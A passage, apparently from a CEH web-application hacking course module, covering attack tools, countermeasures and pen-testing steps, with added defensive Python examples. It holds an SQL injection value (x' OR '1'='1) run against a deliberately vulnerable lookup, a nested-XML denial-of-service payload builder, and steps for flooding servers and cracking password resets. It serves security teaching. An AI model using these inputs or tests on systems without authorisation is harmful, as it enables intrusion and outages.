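    incrementally, so the depth check fires mid-document instead of after the
    parser has already spent the CPU the attacker wanted it to spend.
    Malformed XML still raises ET.ParseError, as usual."""
    if len(data) > max_bytes:
        raise PayloadRejected("oversize", f"{len(data)} bytes > {max_bytes}")
    depth, root = 0, None
    for event, elem in ET.iterparse(io.BytesIO(data), events=("start", "end")):
        if event == "start":
            depth += 1
            if root is None:
                root = elem
            if depth > max_depth:
                raise PayloadRejected("recursive", f"depth {depth} > {max_depth}")
        else:
            depth -= 1
    return root


def classify(data):
    """'ok', 'oversize' or 'recursive' for a submitted request body."""
    try:
        parse_soap_guarded(data)
        return "ok"
    except PayloadRejected as exc:
        return exc.reason


def nested_payload(levels):
    """Constructed request: `levels` nested <a> elements inside the Body."""
    body = "<a>" * levels + "x" + "</a>" * levels
    return (f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
            f"{body}</soap:Body></soap:Envelope>").encode()


if __name__ == "__main__":
    print(classify(nested_payload(3)))                      # ok
    print(classify(nested_payload(500)))                    # recursive
    print(classify(b"<a>" + b"x" * MAX_BYTES + b"</a>"))    # oversize
```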
Web Service Attack Tool: soapUI
soapUI is an open source functional testing tool, mainly used for web service testing. It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. An attacker can use this tool to carry out web services probing, SOAP injection, XML injection, and web services parsing attacks.
FIGURE 13.56: soapUI Tool Screenshot
Altova XMLSpy
Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.
Web Service Attack Tool: XMLSpy
Source: http://www.altova.com
Figure: Altova XMLSpy screenshot
Source: http://www.portswigger.net
FIGURE 13.58: Burp Suite Professional Tool Screenshot
The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values.
Web Application Hacking Tool: CookieDigger
Source: http://www.mcafee.com
CookieDigger is a tool that detects vulnerable cookie generation and the insecure implementation of session management by web applications. This tool is based on the collection and evaluation of cookies issued by a web application to many users. Certainty and entropy of the cookie are the factors on which the tool relies. The cookie values may contain valuable information, such as the login details of the user (user name and password).
FIGURE 13.59: CookieDigger Tool Screenshot
It allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser.
Web Application Hacking Tool: WebScarab
Source: http://www.owasp.org
FIGURE 13.60: WebScarab Tool Screenshot
Web Application Hacking Tools
- Instant Source: http://www.blazingtools.com
- HttpBee: http://www.o0o.nu
- w3af: http://w3af.sourceforge.net
- Teleport Pro: http://www.tenmax.com
- GNU Wget: http://gnuwin32.sourceforge.net
- WebCopier: http://www.maximumsoft.com
- BlackWidow: http://softbytelabs.com
- HTTRACK: http://www.httrack.com
- cURL: http://curl.haxx.se
- MileSCAN ParosPro: http://www.milescan.com
Web Application Hacking Tools
- HTTRACK, available at http://www.httrack.com
Encoding Schemes
An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document.
Encoding Schemes
The HTTP protocol and the HTML language are the two major components of web applications. Both of these components are text based. Web applications employ encoding schemes to ensure that both components handle unusual characters and binary data safely. The encoding schemes include:
URL Encoding
- %3d  =
- %0a  new line
- %20  space
HTML Encoding
- &amp;  &
- &gt;  >
Encoding Schemes (Cont'd)
Example: Jason 123B684AD9
Unicode Encoding, Base64 Encoding, Hex Encoding
UTF-8: a variable-length encoding standard in which each byte is expressed in hexadecimal and preceded by the % prefix, e.g. %c2%a9, %e2%89%a0
TABLE 13.2: Encoding Schemes Table
How to Defend Against SQL Injection Attacks
- Limit the length of user input
- Use custom error messages
- Disable commands like xp_cmdshell
- Isolate database server and web server
- Always use method attribute set to POST
- Move extended stored procedures to an isolated server
- Validate and sanitize user inputs passed to the database
How to Defend Against SQL Injection Attacks
To defend against SQL injection attacks, various things have to be taken care of: unchecked user input should not be allowed to pass into database queries. Every user variable passed to the database should be validated and sanitized. The given input should be checked for the expected data type. User input that is passed to the database should be quoted.
- Limit the length of user input
- Monitor DB traffic using an IDS, WAF
- Disable commands like xp_cmdshell
- Isolate database server and web server
- Always use method attribute set to POST
- Use low privileged account for DB connection
How to Defend Against Command Injection Flaws
The simplest way to protect against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions for many shell commands and some system calls. These libraries do not invoke the operating system shell interpreter, and so avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also arrange the various requests in a pattern which ensures that all given parameters are treated as data instead of potentially executable content. Most system calls, and the use of stored procedures with parameters that accept valid input strings to access a database, or prepared statements, provide significant protection, ensuring that the supplied input is treated as data; this reduces, but does not completely eliminate, the risk involved in these external calls. One can always authorize the input to ensure the protection of the application in question. Least privileged accounts must be used to access a database so that there is the smallest possible loophole.
The use of an external command requires thoroughly checking the user information that is inserted into the command. Create a mechanism for handling all possible errors, timeouts, or blockages during the calls. To ensure the expected work is actually performed, check all the output, return, and error codes from the call. At least this allows the user to determine if something has gone wrong. Otherwise, an attack may occur and never be detected.
- Use a safe API that avoids the use of the interpreter entirely
- Use parameterized SQL queries
- Escape dangerous characters
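Added example (not from the module): the SQL and command injection countermeasures listed above applied to one user lookup and one external call, with the vulnerable lookup kept beside the hardened one. The users table and the stand-in external tool (this interpreter echoing its argument) are constructed.

```python
"""Added example (not from the CEH module): length/type validation, a
parameterized query and a shell-free external call. The users table and the
stand-in external tool are constructed."""
import re
import sqlite3
import subprocess
import sys

MAX_INPUT_LEN = 32                            # limit the length of user input
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]+$")  # expected data type: a bare token


def validate_username(value):
    """Positive check run before the value gets near any interpreter."""
    if len(value) > MAX_INPUT_LEN or not USERNAME_RE.match(value):
        raise ValueError("invalid username")
    return value


def open_db():
    """In-memory SQLite store with two constructed accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, userid INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("jason", "attack", 105), ("gandalf", "example-pw", 101)])
    return db


def lookup_unsafe(db, username):
    """Vulnerable: the value is spliced into the SQL text, so a quote in it
    rewrites the WHERE clause instead of being compared as data."""
    sql = f"SELECT userid FROM users WHERE username = '{username}'"
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, username):
    """Hardened: validation first, then a parameterized query; the driver
    sends the value separately from the statement text."""
    sql = "SELECT userid FROM users WHERE username = ?"
    return [row[0] for row in db.execute(sql, (validate_username(username),))]


def run_tool_safe(username):
    """Hardened external call: argument vector (no shell), a timeout, and the
    return code and output checked rather than assumed. The 'tool' is a
    constructed stand-in: this interpreter printing its first argument."""
    arg = validate_username(username)
    proc = subprocess.run([sys.executable, "-c", "import sys; print(sys.argv[1])", arg],
                          capture_output=True, text=True, timeout=10, check=False)
    if proc.returncode != 0:
        raise RuntimeError(f"tool failed: {proc.stderr.strip()}")
    return proc.stdout.strip()


if __name__ == "__main__":
    db = open_db()
    print(lookup_unsafe(db, "x' OR '1'='1"))   # [105, 101]: both accounts returned
    print(lookup_safe(db, "jason"))            # [105]
    print(run_tool_safe("jason"))              # jason
```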
How to Defend Against XSS Attacks
- Use a web application firewall to block the …
- Filtering script output can also defeat XSS vulnerabilities by …
- Convert all non-alphanumeric characters to HTML character entities
- Develop some standard or signing scripts with private and public keys that …
How to Defend Against XSS Attacks
The following are the defensive techniques to prevent XSS attacks:
- Check and validate all the form fields, hidden fields, headers, cookies, query strings, and all the parameters against a rigorous specification.
- Implement a stringent security policy.
- Filter the script output to defeat XSS vulnerabilities, which can prevent them from being transmitted to users.
- The entire code of the website has to be reviewed if it has to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The areas should be checked as follows: the headers, as well as …
- There are many ways to encode the known filters for active content. A "positive security policy" is highly recommended, which specifies what has to be allowed and what has to be removed. Negative or attack signature-based policies are hard to maintain, as they are incomplete.
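Added example (not from the module) serving both the Encoding Schemes table and the XSS countermeasures above: inputs are canonicalised (URL and HTML encodings undone, repeatedly) before a positive-policy check, and outputs have every non-alphanumeric character converted to an HTML entity. The sample strings and the allow-list are constructed.

```python
"""Added example (not from the CEH module): canonicalise-then-validate on the
way in, entity-encode-everything on the way out. Sample strings and the
allow-list are constructed."""
import html
import urllib.parse

# Constructed positive policy: what a display-name field may contain after decoding.
ALLOWED_EXTRA = set(" .,-_@")


def canonicalize(value, max_rounds=3):
    """Undo URL encoding (%3d, %20, %c2%a9 ...) and HTML entities (&amp;, &gt;)
    until the string stops changing, so a double-encoded %253c is seen as '<'.
    Returns the canonical string and the number of rounds that changed it."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = html.unescape(urllib.parse.unquote(value))
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def is_allowed(value):
    """Validate the canonical form against the allow-list, never the raw
    encoded input; anything outside ASCII alphanumerics plus ALLOWED_EXTRA
    fails, so encoded '<' or 'javascript:' never reach the application."""
    canon, _ = canonicalize(value)
    return all(ch.isascii() and (ch.isalnum() or ch in ALLOWED_EXTRA) for ch in canon)


def encode_for_html(value):
    """Output side: every non-alphanumeric character becomes a numeric entity,
    so supplied data cannot be interpreted as markup or script."""
    return "".join(ch if (ch.isascii() and ch.isalnum()) else f"&#{ord(ch)};"
                   for ch in value)


if __name__ == "__main__":
    for sample in ("Jason%20123", "%c2%a9", "a%253cb", "&amp;gt;"):
        print(sample, "->", canonicalize(sample), "allowed:", is_allowed(sample))
    print(encode_for_html("<b>x=1</b>"))   # &#60;b&#62;x&#61;1&#60;&#47;b&#62;
```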
How to Defend Against DoS Attacks
- Secure the remote administration and connectivity testing
- Configure the firewall to deny external Internet Control Message Protocol …
- Prevent use of unnecessary functions such as gets, strcpy, and return addresses from being overwritten, etc.
- Prevent the sensitive information from overwriting
- Data processed by the attacker should be stopped from being executed
- Perform thorough input validation
How to Defend Against DoS Attacks
The following are the various measures that can be adopted to defend against DoS attacks:
- Perform thorough input validation.
How to Defend Against Web Services Attacks
- Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages.
- Use document-centric authentication credentials that use SAML.
- Block external references and use pre-fetched content when de-referencing URLs.
- Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.
- Maintain and update a secure repository of XML schemas.
Web Application Countermeasures
Avoid using redirects and forwards. If destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user.
Cross-Site Request Forgery
- Log off immediately after using a web application and clear the history.
- Do not allow your browser and websites to save login details.
- Check the HTTP Referer header and, when processing a POST, ignore URL parameters.
- Use SSL for all authenticated parts of the application.
- Verify whether all the users' identities and credentials are stored in a hashed form.
- Never submit session data as part of a GET, POST.
- Ensure that encrypted data stored on disk is not easy to decrypt.
Web Application Countermeasures (Cont'd)
- Non-SSL requests to web pages should be redirected to the SSL page.
- Configure SSL provider to support only strong algorithms.
- Ensure the certificate is valid, not expired, and matches all domains used by the site.
- Backend and other connections should also use SSL or other encryption technologies.
Directory Traversal
- … such as Unicode to affect the directory traversal
- Web servers should be updated with security patches in a timely manner.
- Do not store plain text or weakly encrypted passwords in a cookie.
- Implement cookie timeouts.
- Cookie authentication credentials should be associated with an IP address.
- Make logout functions available.
Security Misconfiguration
- Configure all security mechanisms and turn off all unused services
- Setup roles, permissions, and accounts and disable all default accounts or change their default passwords
- Scan for latest security vulnerabilities and apply the latest security patches
LDAP Injection Attacks
- Perform type, pattern, and domain value validation on all input data
- Make LDAP filter as specific as possible
- Validate and restrict the amount of data returned to the user
- Implement tight access control on the data in the LDAP directory
- Perform dynamic testing and source code analysis
File Injection Attack
- Strongly validate user input
- Consider implementing a chroot jail
- PHP: Disable allow_url_fopen and allow_url_include in php.ini
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables
- PHP: Ensure that all file and streams functions (stream_*) are carefully vetted
Web Application Countermeasures (Cont'd)
Security Misconfiguration
- Configure all security mechanisms and turn off all unused services.
- Setup roles, permissions, and accounts and disable all default accounts or change their default passwords.
LDAP Injection Attacks
- Perform type, pattern, and domain value validation on all input data.
- Make LDAP filters as specific as possible.
- Implement tight access control on the data in the LDAP directory.
- Perform dynamic testing and source code analysis.
File Injection Attack
- Consider implementing a chroot jail.
- PHP: Disable allow_url_fopen and allow_url_include in php.ini.
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
- PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.
How to Defend Against Web Application Attacks
To defend against web application attacks, you can follow the countermeasures stated previously. To protect the web server, you can use a WAF firewall/IDS and filter packets. You need to constantly update the software using patches to keep the server up-to-date and to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameter queries to retrieve data, and disable verbose error messages, which can guide the attacker with some useful information, and use custom error pages to protect the web applications. To avoid SQL injection into the database, connect using a non-privileged account and grant least privileges to the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
Figure: defending the web application (Attacker → Internet → WAF firewall/IDS and filter packets → Login Form; keep patches current)
Module Flow
Now we will discuss web application security tools. Web application security tools help you to detect the possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked. Tools, in addition to the countermeasures, offer more protection.
Acunetix Web Vulnerability Scanner
- Tests web forms and password-protected areas
- Includes an automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications
[Screenshot: Acunetix Web Vulnerability Scanner scan results, 77 alerts, Acunetix Threat Level 3]
http://www.acunetix.com
Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Acunetix Web Vulnerability Scanner automatically checks your web applications for SQL injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It even tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications.
[Screenshot: Acunetix Web Vulnerability Scanner scan results for http://testaspnet.vulnweb.com:80/, 77 alerts, Acunetix Threat Level 3: High]
[Screenshot: Casaba Watcher Web Security Tool v1.3.0 check configuration: header checks (Cache-Control, Content-Type, X-XSS-Protection, X-Content-Type-Options, X-Frame-Options) and information disclosure checks (database error messages, dubious comments, sensitive information in URL parameters, debug messages). Copyright 2010 Casaba Security, LLC. All rights reserved.]
http://www.casaba.com
Web Application Security Tool: Watcher
Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. Passive detection means it's safe for production use. It detects web-application security issues and operational configuration issues.
FIGURE 13.63: Watcher Web Security Tool Screenshot
[Screenshot: Netsparker 2.0.0.0 (Mavituna Security Limited) reporting a cross-site scripting vulnerability: URL, parameter name, parameter type, attack pattern, classification, vulnerability details]
FIGURE 13.64: Netsparker Tool Screenshot
Web Application Security Tool: N-Stalker Web Application Security Scanner
[Screenshot: N-Stalker Web Application Security Scanner 2012 - Free Edition dashboard: scan session, spider and crawled URL statistics, vulnerabilities by severity]
http://nstalker.com
Web Application Security Tool: VampireScan
Features
- Protect your website from hackers
- Scan and protect your infrastructure and web applications from cyber-threats
- Give you direct, actionable insight on high, medium, and low risk vulnerabilities
http://www.vampiretech.com
[Screenshot: VampireScan summary of scans with status, site URL, description, scanner, latest results, grade, and vulnerability counts]
- Sandcat Mini: http://www.syhunt.com
- Websecurify: http://www.websecurify.com
- OWASP ZAP: http://www.owasp.org
- NetBrute: http://www.rawlogic.com
- WSSA - Web Site Security Scanning Service: https://secure.beyondsecurity.com
- SecuBat Vulnerability Scanner: http://secubat.codeplex.com
- SPIKE Proxy: http://www.immunitysec.com
- Ratproxy: http://code.google.com
Web application security tools are web application security assessment software designed to thoroughly analyze today's complex web applications with the aim of finding exploitable SQL injection, XSS vulnerabilities, etc. These tools deliver scanning capabilities, broad assessment coverage, and accurate web application scanning results. Commonly used web application security tools are listed as follows:
- OWASP ZAP available at http://www.owasp.org
- skipfish available at http://code.google.com
- SPIKE Proxy available at http://www.immunitysec.com
- x5s available at http://www.casaba.com
- WSSA - Web Site Security Scanning Service available at https://secure.beyondsecurity.com
- Wapiti: http://wapiti.sourceforge.net
- Syhunt Hybrid: http://www.syhunt.com
- WebWatchBot: http://www.exclamationsoft.com
- Exploit-Me: http://labs.securitycompass.com
- KeepNI: http://www.keepni.com
- WSDigger: http://www.mcafee.com
- Grabber: http://rgaucher.info
- Arachni: http://arachni-scanner.com
- xsss: http://www.sven.de
- Vega: http://www.subgraph.com
In addition to the previously mentioned web application security tools, there are a few more tools that can be used to assess the security of web applications:
- xsss available at http://www.sven.de
- Syhunt Hybrid available at http://www.syhunt.com
- WSDigger available at http://www.mcafee.com
- Vega available at http://www.subgraph.com
- dotDefender is a software-based Web Application Firewall
- It complements the network firewall, IPS and other network-based Internet security products
- It inspects the HTTP/HTTPS traffic for suspicious behavior
- It detects and blocks SQL
[Screenshot: dotDefender SQL Injection pattern settings (Suspect Single Quote, Classic SQL Comment, SQL Comments, 'Select Version' Statement, SQL CHAR Type)]
http://www.applicure.com
dotDefender™ is a software-based web application firewall that provides additional website security against malicious attacks and website defacement. It protects your website from malicious attacks. Web application attacks such as SQL injection, path traversal, cross-site scripting, and other attacks leading to website defacement can be prevented with dotDefender. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.
FIGURE 13.67: dotDefender
ServerDefender VP web application firewall is designed to provide security against web attacks
[Screenshot: ServerDefender VP input validation settings: SQL Injection, Cross-Site Scripting (XSS), Generic Input Sanitization levels None, Minimum, Extended, Paranoid]
http://www.port80software.com
The ServerDefender VP web application firewall is designed to provide security against web attacks. SDVP security will prevent data theft and breaches and stop unauthorized site defacement, file alterations, and deletions.
[Screenshot: ServerDefender VP web application firewall (port80): protection for Default Web Site is ON, Generic Input Sanitization, Enforcement Level, Site Status, Blocked IPs, Alerting, Reporting, statistics since 11/8/2011]
FIGURE 13.68: ServerDefender VP
- QualysGuard WAF: http://www.qualys.com
- IBM Security AppScan: http://www-01.ibm.com
- ThreatRadar: http://www.imperva.com
- Trustwave WebDefend: https://www.trustwave.com
- ThreatRadar available at http://www.imperva.com
- IBM Security AppScan available at http://www-01.ibm.com
Module Flow
As mentioned previously, web applications are more vulnerable to attacks. Attackers use web applications as sources for spreading attacks by turning them into malicious applications once compromised. Your web application may also become a victim of such attacks. Therefore, to avoid this situation, you should conduct penetration testing in order to determine the vulnerabilities before they are exploited by real attackers.
Web applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.
Web application pen testing is used to identify, analyze, and report vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. in a given application.
Web application pen testing helps in:
- Identification of Ports
- Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the issue.
- Remediation of Vulnerabilities
Web Application Pen Testing (Cont'd)
Step 1: Defining objective
You should define the aim of the penetration test before conducting it. This helps you move in the right direction towards the aim of the penetration test.
Step 2: Information gathering
Step 3: Configuration management testing
Step 4: Authentication testing
Step 5: Session management testing
Step 6: Denial-of-service testing
Send a vast amount of requests to the web application until the server gets saturated. Analyze the behavior of the application when the server is saturated. In this way you can test your web application against denial-of-service attacks.
Step 7: Data validation testing
Failing to adopt a proper data validation method is the common security weakness observed in most web applications. This may further lead to major vulnerabilities in web applications. Hence, before a hacker finds those vulnerabilities and exploits your application, perform data validation testing and protect your web application.
Step 8: Business logic testing
Web application security flaws may be present even in business logic. Hence, you should test the business logic for flaws. Exploiting this business logic, attackers may do something that is not allowed by the business, and it may sometimes lead to great financial loss. Testing business logic for security flaws requires unconventional thinking.
Step 9: Authorization testing
Step 10: Web services testing
Step 11: AJAX testing
Though more responsive web applications are developed using AJAX, they are likely as vulnerable as a traditional web application. Testing for AJAX is challenging because web application developers are given full freedom to design the way of communication between client and server.
Step 12: Document all the findings
Once you conduct all the tests mentioned here, document all the findings and the testing techniques employed at each step. Analyze the document and explain the current security posture to the concerned parties and suggest how they can enhance their security.
Information Gathering
Step 1: Analyze the robots.txt file
robots.txt is a file that instructs web robots about the website, such as which directories are allowed and disallowed. Hence, analyze robots.txt and determine the allowed and disallowed directories of the web application. You can retrieve and analyze the robots.txt file using tools such as GNU Wget.
Step 2: Perform search engine reconnaissance
Use the advanced "site:" search operator and then click Cached to perform search engine reconnaissance. It gives you information such as issues of web application structure and error pages produced.
Step 3: Identify application entry points
Identify application entry points using tools such as WebScarab, Burp Proxy, OWASP ZAP, TamperIE (for Internet Explorer), or TamperData (for Firefox). Cookie information, 300 and 400 HTTP status codes, and 500 internal server errors may give clues about entry points of the target web application.
Step 5: Analyze the output from HEAD and OPTIONS HTTP requests
Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, and querying search engines (Googling). This may reveal information such as web server software version, scripting environment, and OS in use.
Information Gathering (Cont'd)
Step 6: Analyze error codes
Analyze error codes by requesting invalid pages and utilizing alternate request methods (POST/PUT/other) in order to collect confidential information from the server. This may reveal information such as software versions, details of databases, bugs, and technological components.
Step 7: Test for recognized file types/extensions/directories
Test for recognized file types/extensions/directories by requesting common file extensions such as .ASP, .HTM, .PHP, .EXE, and observe the response. This may give you an idea about the web application environment.
Step 8: Examine source of available pages
Step 9: TCP/ICMP and service fingerprinting
Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap. This gives you information about web application services and associated ports.
Configuration Management Testing
- Verify the presence of old, backup, and unreferenced files: may reveal source code, installation paths, and passwords for applications and databases
- Test for infrastructure and application admin interfaces: admin interfaces can be found to gain access to admin functionality
Once you gather information about the web application environment, test the configuration management. It is important to test the configuration management because improper configuration may allow unauthorized users to break into the web application.
Step 1: Perform SSL/TLS testing
SSL/TLS testing allows you to identify the ports associated with SSL/TLS wrapped services. You can do this with the help of tools such as Nmap and Nessus. This helps disclose confidential information.
Step 2: Perform infrastructure configuration management testing
Step 3: Perform application configuration management testing
Step 4: Test for file extensions handling
Step 5: Verify the presence of old, backup, and unreferenced files
Review source code and enumerate application pages and functionality to verify the old, backup, and unreferenced files. This may reveal the installation paths and passwords for applications and databases.
Step 6: Test for infrastructure and application admin interfaces
Perform directory and file enumeration, review server and application documentation, etc. to test for infrastructure and application admin interfaces. Admin interfaces can be used to gain access to the admin functionality.
Step 7: Test for HTTP methods and XST
Review the OPTIONS HTTP method using Netcat or Telnet to test for HTTP methods and XST. This may reveal credentials of legitimate users.
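As an added example (not code from the CEH module or from any tool above), the following Python parses a constructed robots.txt and a constructed OPTIONS response and pulls out what Step 1 and Step 5 of Information Gathering and Step 7 of Configuration Management Testing ask you to look at: disallowed directories, version-disclosing headers, and enabled methods such as TRACE. All sample values are constructed placeholders.

```python
import re

# Constructed sample robots.txt (paths are placeholders, not a real site).
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/
Disallow: /cgi-bin/   # a crawler hint only, never an access control
Sitemap: https://www.example.invalid/sitemap.xml
"""

# Constructed raw HTTP/1.1 response to an OPTIONS request (headers only).
OPTIONS_RESPONSE = """\
HTTP/1.1 200 OK
Date: Mon, 01 Jan 2024 00:00:00 GMT
Server: Apache/2.2.22 (Unix) PHP/5.3.10
Allow: GET,HEAD,POST,OPTIONS,TRACE
X-Powered-By: PHP/5.3.10
Content-Length: 0
"""

# Headers that commonly leak software versions (Step 5: analyze HEAD/OPTIONS output).
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
# Methods to flag in Step 7 (HTTP methods and XST); TRACE is what makes XST possible.
RISKY_METHODS = {"TRACE", "PUT", "DELETE", "CONNECT"}


def parse_robots(text):
    """Return {'allow': [...], 'disallow': [...]} from robots.txt directives."""
    result = {"allow": [], "disallow": []}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key in result and value:
            result[key].append(value)
    return result


def parse_headers(raw_response):
    """Parse the header block of a raw HTTP response into a lower-cased dict."""
    headers = {}
    for line in raw_response.splitlines()[1:]:   # [0] is the status line
        if not line.strip():
            break                                  # blank line ends the headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def version_disclosures(headers):
    """Return the disclosure headers whose value carries a version number."""
    return {
        name: headers[name]
        for name in DISCLOSURE_HEADERS
        if name in headers and re.search(r"\d+\.\d+", headers[name])
    }


def risky_methods(headers):
    """Return the risky methods advertised in the Allow header, sorted."""
    advertised = {m.strip().upper() for m in headers.get("allow", "").split(",")}
    return sorted(advertised & RISKY_METHODS)


def analyze(robots_txt, options_response):
    """Summarize what the server discloses; each key maps to a test step above."""
    headers = parse_headers(options_response)
    return {
        "disallowed": parse_robots(robots_txt)["disallow"],   # Step 1 (information gathering)
        "disclosures": version_disclosures(headers),          # Step 5 (information gathering)
        "risky_methods": risky_methods(headers),              # Step 7 (configuration management)
    }


if __name__ == "__main__":
    for key, value in analyze(ROBOTS_TXT, OPTIONS_RESPONSE).items():
        print(f"{key}: {value}")
```

A finding of TRACE in Allow is the cue to disable the method on the server, and a version in Server or X-Powered-By is the cue to suppress the banner; a Disallow entry is a hint to crawlers only and must be backed by real access control.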
Authentication Testing
- Test for race conditions: Attempt to force a race condition, make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review.
Step 1: Test for vulnerable remember password and pwd reset
Test for vulnerable remember password and pwd reset by attempting to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check if a "remember my password" mechanism is implemented by checking the HTML code of the login page; through this password, an authentication weakness can be uncovered.
Step 2: Test for logout and browser cache management
Step 3: Test for CAPTCHA
Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID. This helps you determine authentication vulnerabilities.
Step 4: Test for multiple factor authentication
Check if users hold a hardware device of some kind in addition to the password. Check if the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel.
Step 5: Test for race conditions
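As an added example (not from the CEH module), the following Python shows the check-then-act flaw that Step 5's "multiple simultaneous requests" test surfaces, using a constructed single-use password-reset token store (the class and token are hypothetical) with the unlocked redeemer beside the locked one a code review should expect.

```python
import threading
import time


class ResetTokenStore:
    """Constructed store of single-use reset tokens. `delay` simulates the
    database round trip between the check and the act; it widens the race
    window so the flaw shows reliably in a demo, but real code has the same
    window, only smaller."""

    def __init__(self, tokens, delay=0.05):
        self._unused = set(tokens)
        self._delay = delay
        self._lock = threading.Lock()

    def redeem_unsafe(self, token):
        # Vulnerable pattern: check, then act, with nothing making the pair atomic.
        if token in self._unused:          # check
            time.sleep(self._delay)        # simulated DB round trip
            self._unused.discard(token)    # act
            return True
        return False

    def redeem_safe(self, token):
        # Fixed pattern: check and act under one lock (in a real app, one atomic
        # UPDATE ... WHERE token = ? AND used = 0 and test the affected-row count).
        with self._lock:
            if token in self._unused:
                time.sleep(self._delay)
                self._unused.discard(token)
                return True
            return False


def concurrent_redeems(redeem, token, n=8):
    """Fire n simultaneous redemptions of the same token; return how many succeeded."""
    results = []
    barrier = threading.Barrier(n)         # release all workers at the same instant

    def worker():
        barrier.wait()
        results.append(redeem(token))      # list.append is atomic in CPython

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


def demo():
    """Return (successful redemptions without lock, successful redemptions with lock)."""
    token = "tok-constructed-1"             # constructed sample value
    unsafe = concurrent_redeems(ResetTokenStore([token]).redeem_unsafe, token)
    safe = concurrent_redeems(ResetTokenStore([token]).redeem_safe, token)
    return unsafe, safe


if __name__ == "__main__":
    unsafe_count, safe_count = demo()
    print(f"without lock: {unsafe_count} redemptions of one token")
    print(f"with lock:    {safe_count} redemption of one token")
```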
Session Management Testing
Step 1: Test for session management schema
Step 2: Test for cookie attributes
Step 3: Test for session fixation
Step 4: Test for exposed session variables
Step 5: Test for CSRF (Cross Site Request Forgery)
Examine the URLs in the restricted area to test for CSRF. A CSRF attack compromises end-user data and operation, or the entire web application.
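An added example (not from the CEH module) in Python that applies Steps 2, 3 and 5 to constructed Set-Cookie headers from a login exchange: it flags missing Secure, HttpOnly and SameSite attributes and a session ID that is not regenerated at login. Cookie names and values are placeholders.

```python
# Constructed Set-Cookie headers: the one issued before login and two candidate
# post-login responses, one that keeps the old ID and one that regenerates it.
PRE_LOGIN_SET_COOKIE = "SESSIONID=abc123; Path=/"
POST_LOGIN_SET_COOKIE_BAD = "SESSIONID=abc123; Path=/"
POST_LOGIN_SET_COOKIE_GOOD = "SESSIONID=zz9f8e7d; Path=/; Secure; HttpOnly; SameSite=Lax"

REQUIRED_FLAGS = ("secure", "httponly")   # Step 2: cookie attributes


def parse_set_cookie(header):
    """Return (name, value, attrs) for one Set-Cookie header.
    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their value."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def cookie_findings(header):
    """Step 2 checks on the session cookie's attributes."""
    name, _, attrs = parse_set_cookie(header)
    findings = [f"{name}: missing {flag} flag" for flag in REQUIRED_FLAGS if flag not in attrs]
    if "samesite" not in attrs:
        # Step 5: without SameSite the browser attaches the cookie to cross-site requests
        findings.append(f"{name}: no SameSite attribute (CSRF exposure)")
    return findings


def fixation_finding(pre_login, post_login):
    """Step 3: the ID handed out before login must not survive authentication."""
    name_before, value_before, _ = parse_set_cookie(pre_login)
    name_after, value_after, _ = parse_set_cookie(post_login)
    if name_before == name_after and value_before == value_after:
        return f"{name_after}: session ID not regenerated at login (session fixation)"
    return None


def audit(pre_login, post_login):
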